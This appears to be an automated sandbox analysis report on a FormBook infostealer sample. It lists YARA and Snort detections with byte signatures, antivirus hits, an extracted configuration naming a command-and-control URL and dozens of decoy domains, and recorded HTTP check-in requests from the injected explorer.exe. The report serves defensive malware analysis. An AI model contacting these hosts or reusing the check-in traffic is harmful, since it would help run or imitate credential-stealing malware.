00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17f89:$sqlite3step: 68 34 1C 7B E1 0x1809c:$sqlite3step: 68 34 1C 7B E1 0x17fb8:$sqlite3text: 68 38 2A 90 C5 0x180dd:$sqlite3text: 68 38 2A 90 C5 0x17fcb:$sqlite3blob: 68 53 D8 7F 8C 0x180f3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: 7pECKdsaig.exe PID: 6000	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1fe9:$a1: 3C 30 50 4F 53 54 74 09 40 0x291ca:$a1: 3C 30 50 4F 53 54 74 09 40 0x68cc0:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: explorer.exe PID: 3452	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x1b8404:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: msdt.exe PID: 5148	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xf06b0:$a1: 3C 30 50 4F 53 54 74 09 40 0xf17e5:$a1: 3C 30 50 4F 53 54 74 09 40 0x1200dd:$a1: 3C 30 50 4F 53 54 74 09 40 0x17fdfb:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 48 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.7pECKdsaig.exe.a80000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.7pECKdsaig.exe.a80000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.7pECKdsaig.exe.a80000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.7pECKdsaig.exe.a80000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.7pECKdsaig.exe.a80000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
0.0.7pECKdsaig.exe.a80000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.0.7pECKdsaig.exe.a80000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.0.7pECKdsaig.exe.a80000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.0.7pECKdsaig.exe.a80000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.0.7pECKdsaig.exe.a80000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 5 entries

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 34.102.136.180

Timestamp:	192.168.2.634.102.136.18049707802031453 03/20/23-09:12:27.000047
SID:	2031453
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 34.102.136.180

Timestamp:	192.168.2.634.102.136.18049707802031449 03/20/23-09:12:27.000047
SID:	2031449
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 34.102.136.180

Timestamp:	192.168.2.634.102.136.18049707802031412 03/20/23-09:12:27.000047
SID:	2031412
Source Port:	49707
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 7pECKdsaig.exe	ReversingLabs: Detection: 76%
Source: 7pECKdsaig.exe	Virustotal: Detection: 59%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 7pECKdsaig.exe, type: SAMPLE
Source: Yara match	File source: 0.2.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.7pECKdsaig.exe.a80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.288830411.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.520351827.0000000004FCF000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.518766538.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.289007135.0000000001210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.249149614.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.531047978.000000001389F000.00000004.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.518698032.0000000002EB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.517165647.0000000000580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.517610096.00000000008C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Antivirus / Scanner detection for submitted sample

Source: 7pECKdsaig.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.jacksontcpassettlement.com/ar73/www.ingrambaby.com	Avira URL Cloud: Label: malware
Source: http://www.b708.com/ar73/	Avira URL Cloud: Label: malware
Source: http://www.hurricanevalleyatvjamboree.com/ar73/www.innovantexclusive.com	Avira URL Cloud: Label: malware
Source: http://www.kellnovaglobalfood.info/ar73/	Avira URL Cloud: Label: malware
Source: http://www.echadholisticbar.com/ar73/www.jacksontcpassettlement.com	Avira URL Cloud: Label: malware
Source: http://www.quickhealcareltd.co.uk/ar73/	Avira URL Cloud: Label: malware
Source: http://www.mogi.africa/ar73/www.kellnovaglobalfood.info	Avira URL Cloud: Label: malware
Source: http://www.ckpconsulting.com/ar73/www.2348x.com	Avira URL Cloud: Label: malware
Source: http://www.kellnovaglobalfood.info/ar73/www.controlplus.systems	Avira URL Cloud: Label: malware
Source: http://www.controlplus.systems/ar73/www.quickhealcareltd.co.uk	Avira URL Cloud: Label: malware
Source: http://www.kellnovaglobalfood.info/ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_	Avira URL Cloud: Label: malware
Source: http://www.ckpconsulting.com/ar73/	Avira URL Cloud: Label: malware
Source: http://www.mtevz.online/ar73/	Avira URL Cloud: Label: malware
Source: http://www.2348x.com/ar73/	Avira URL Cloud: Label: malware
Source: http://www.arredobagno.club/ar73/www.mtevz.online	Avira URL Cloud: Label: malware
Source: http://www.hurricanevalleyatvjamboree.com/ar73/	Avira URL Cloud: Label: malware
Source: http://www.ingrambaby.com/ar73/	Avira URL Cloud: Label: malware
Source: http://www.innovantexclusive.com/ar73/www.1wwuwa.top	Avira URL Cloud: Label: malware
Source: http://www.controlplus.systems/ar73/	Avira URL Cloud: Label: malware
Source: http://www.echadholisticbar.com/ar73/	Avira URL Cloud: Label: malware
Source: http://www.jacksontcpassettlement.com/ar73/	Avira URL Cloud: Label: malware
Source: http://www.authenticityhacking.com/ar73/	Avira URL Cloud: Label: malware
Source: http://www.ingrambaby.com/ar73/www.arredobagno.club	Avira URL Cloud: Label: malware
Source: http://www.mogi.africa/ar73/	Avira URL Cloud: Label: malware
Source: http://www.arredobagno.club/ar73/	Avira URL Cloud: Label: malware
Source: http://www.1wwuwa.top/ar73/www.echadholisticbar.com	Avira URL Cloud: Label: malware
Source: http://www.b708.com/ar73/www.hurricanevalleyatvjamboree.com	Avira URL Cloud: Label: malware
Source: http://www.controlplus.systems/ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_	Avira URL Cloud: Label: malware
Source: http://www.authenticityhacking.com/ar73/www.ckpconsulting.com	Avira URL Cloud: Label: malware
Source: http://www.mtevz.online/ar73/r	Avira URL Cloud: Label: malware
Source: http://www.2348x.com/ar73/www.b708.com	Avira URL Cloud: Label: malware
Source: www.2348x.com/ar73/	Avira URL Cloud: Label: malware
Source: http://www.1wwuwa.top/ar73/	Avira URL Cloud: Label: malware
Source: http://www.quickhealcareltd.co.uk/ar73/www.authenticityhacking.com	Avira URL Cloud: Label: malware
Source: http://www.innovantexclusive.com/ar73/	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: 7pECKdsaig.exe

Joe Sandbox ML: detected

Source: 0.0.7pECKdsaig.exe.a80000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.7pECKdsaig.exe.a80000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: 00000000.00000002.289101701.0000000001370000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.2348x.com/ar73/"], "decoy": ["classgorilla.com", "b6817.com", "1wwuwa.top", "dgslimited.africa", "deepwaterships.com", "hkshshoptw.shop", "hurricanevalleyatvjamboree.com", "ckpconsulting.com", "laojiangmath.com", "authenticityhacking.com", "family-doctor-53205.com", "investinstgeorgeut.com", "lithoearthsolution.africa", "quickhealcareltd.co.uk", "delightkgrillw.top", "freezeclosettoilet.com", "coo1star.com", "gemgamut.com", "enrichednetworksolutions.com", "betterbeeclean.com", "kbmstr.com", "colorusainc.com", "five-dollar-meals.com", "baozhuang8.com", "la-home-service.com", "innovantexclusive.com", "chateaudevillars.co.uk", "echadholisticbar.com", "naijacarprices.africa", "4652.voto", "kraftheonz.com", "ingrambaby.com", "braeunungsoel.ch", "sweetcariadgifts.co.uk", "kui693.com", "akatov-top.ru", "epollresearch.online", "cupandsaucybooks.com", "arredobagno.club", "gt.sale", "dskincare.com", "cursosemcasa.site", "leaf-spa.net", "deathbeforedeceit.com", "azvvs.com", "laptops-39165.com", "ccwt.vip", "011965.com", "mtevz.online", "jacksontcpassettlement.com", "aldeajerusalen.com", "kellnovaglobalfood.info", "alphametatek.online", "lcssthh.com", "dumelogold9ja.africa", "d-storic.com", "mogi.africa", "ghostt.net", "aksharsigns.online", "goglucofort.com", "b708.com", "controlplus.systems", "lightandstory.info", "invstcai.sbs"]}

Source: 7pECKdsaig.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 7pECKdsaig.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: msdt.pdbGCTL source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.281701865.000000000352D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: 7pECKdsaig.exe, 00000000.00000003.251882713.000000000155D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.292381298.000000000490D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.289235822.000000000476D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 7pECKdsaig.exe, 7pECKdsaig.exe, 00000000.00000003.251882713.000000000155D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.000000000180F000.00000040.00001000.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000002.00000003.292381298.000000000490D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004BBF000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000002.00000003.289235822.000000000476D000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000002.00000002.519078571.0000000004AA0000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: msdt.pdb source: 7pECKdsaig.exe, 00000000.00000002.293667137.0000000003520000.00000040.10000000.00040000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.281701865.000000000352D000.00000004.00000020.00020000.00000000.sdmp, 7pECKdsaig.exe, 00000000.00000003.287536333.00000000036A4000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 4x nop then pop ebx	0_2_00A87B1A
Source: C:\Users\user\Desktop\7pECKdsaig.exe	Code function: 4x nop then pop edi	0_2_00A96CDD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 4x nop then pop ebx	2_2_00587B1D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 4x nop then pop edi	2_2_00596CDD

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.controlplus.systems
Source: C:\Windows\explorer.exe	Domain query: www.mogi.africa
Source: C:\Windows\explorer.exe	Domain query: www.kellnovaglobalfood.info
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49707 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49707 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49707 -> 34.102.136.180:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.2348x.com/ar73/

Source: global traffic	HTTP traffic detected: GET /ar73/?Qj=i6BPGBhEPZBlfl7tAP1UBBwzioJGNNDALkR90REkFgMzqoaCb5EMO/kcO5kV95GeH/kMM6gDFg==&x6=n0GdIP_ HTTP/1.1Host: www.kellnovaglobalfood.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ar73/?Qj=pTDthzaqbIgyWHdtpzpwnulvL2qvi2wcQCOYQZrmaB3EJlnnV9x+gp8AnzNn3ZLGsW0uMr4raA==&x6=n0GdIP_ HTTP/1.1Host: www.controlplus.systemsConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 20 Mar 2023 08:12:27 GMTContent-Type: text/htmlContent-Length: 291ETag: "64063330-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 20 Mar 2023 08:12:47 GMTContent-Type: text/htmlContent-Length: 291ETag: "63fcb05a-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.1wwuwa.top
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.1wwuwa.top/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.1wwuwa.top/ar73/www.echadholisticbar.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.1wwuwa.topReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.2348x.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.2348x.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.2348x.com/ar73/www.b708.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.2348x.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arredobagno.club
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arredobagno.club/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arredobagno.club/ar73/www.mtevz.online
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.arredobagno.clubReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.authenticityhacking.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.authenticityhacking.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.authenticityhacking.com/ar73/www.ckpconsulting.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.authenticityhacking.comReferer:
Source: explorer.exe, 00000001.00000003.461649448.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.292213498.000000000F5A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461216185.000000000F53F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.267709513.000000000F5A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.462393796.000000000F5B3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.254183869.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.289061192.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.526453234.0000000008442000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.517440543.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000002.530310030.000000000F5B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.288711256.000000000F5A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.263735895.0000000008442000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.b708.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.b708.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.b708.com/ar73/www.hurricanevalleyatvjamboree.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.b708.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ckpconsulting.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ckpconsulting.com/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ckpconsulting.com/ar73/www.2348x.com
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ckpconsulting.comReferer:
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.controlplus.systems
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.controlplus.systems/ar73/
Source: explorer.exe, 00000001.00000002.525713546.000000000833A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.461649448.0000000008356000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.controlplus.systems/ar73/www.quickhealcareltd.co.uk
